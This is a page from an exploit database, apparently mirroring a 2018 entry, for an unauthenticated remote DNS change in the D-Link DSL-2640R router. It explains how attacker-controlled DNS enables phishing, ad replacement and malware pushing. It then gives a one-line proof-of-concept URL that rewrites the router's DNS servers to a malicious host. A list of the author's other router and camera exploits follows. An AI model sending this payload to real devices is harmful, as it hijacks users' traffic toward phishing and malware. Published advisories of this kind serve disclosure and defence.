Search for hundreds of thousands of exploits

"D-Link DSL-2640R - DNS Change"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

hardware

Release date

Exploit published date

2018-01-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#
#
#  D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
#
#  Firmware Version: UK_1.06 Hardware Version: B1
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg/
#
#  Description:  
#  The vulnerability exist in the web interface.
#  D-Link's various routers are susceptible to unauthorized DNS change. 
#  The problem is when entering an invalid / wrong user and password.  
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link 
#  DEVICES MAY AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  

Proof of Concept:

http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>
Release DateTitleTypePlatformAuthor
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2019-10-08"Zabbix 4.4 - Authentication Bypass"webappsphp"Todor Donev"
2019-09-23"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure"remotehardware"Todor Donev"
2019-09-09"WordPress 5.2.3 - Cross-Site Host Modification"webappsphp"Todor Donev"
2019-09-02"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"remotehardware"Todor Donev"
2019-09-02"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection"remotehardware"Todor Donev"
2019-05-24"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"webappsphp"Todor Donev"
2018-07-11"Awk to Perl 1.007-5 - Buffer Overflow (PoC)"locallinux"Todor Donev"
2018-06-22"Opencart < 3.0.2.0 - Denial of Service"dosphp"Todor Donev"
2018-04-02"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change"webappshardware"Todor Donev"
2018-03-30"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)"webappsasp"Todor Donev"
2018-03-30"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change"webappsasp"Todor Donev"
2018-03-28"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change"webappshardware"Todor Donev"
2018-01-17"D-Link DSL-2640R - DNS Change"webappshardware"Todor Donev"
2017-06-18"D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change"webappshardware"Todor Donev"
2017-06-17"Beetel BCM96338 Router - DNS Change"webappshardware"Todor Donev"
2017-06-17"UTstarcom WA3002G4 - DNS Change"webappshardware"Todor Donev"
2017-06-17"D-Link DSL-2640U - DNS Change"webappshardware"Todor Donev"
2017-06-16"iBall Baton iB-WRA150N - DNS Change"webappshardware"Todor Donev"
2017-01-22"SunOS 5.11 ICMP - Denial of Service"dosunix"Todor Donev"
2017-01-19"Pirelli DRG A115 v3 ADSL Router - DNS Change"webappshardware"Todor Donev"
2017-01-19"Tenda ADSL2/2+ Modem D820R - DNS Change"webappshardware"Todor Donev"
2017-01-16"Pirelli DRG A115 ADSL Router - DNS Change"webappshardware"Todor Donev"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/43678/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.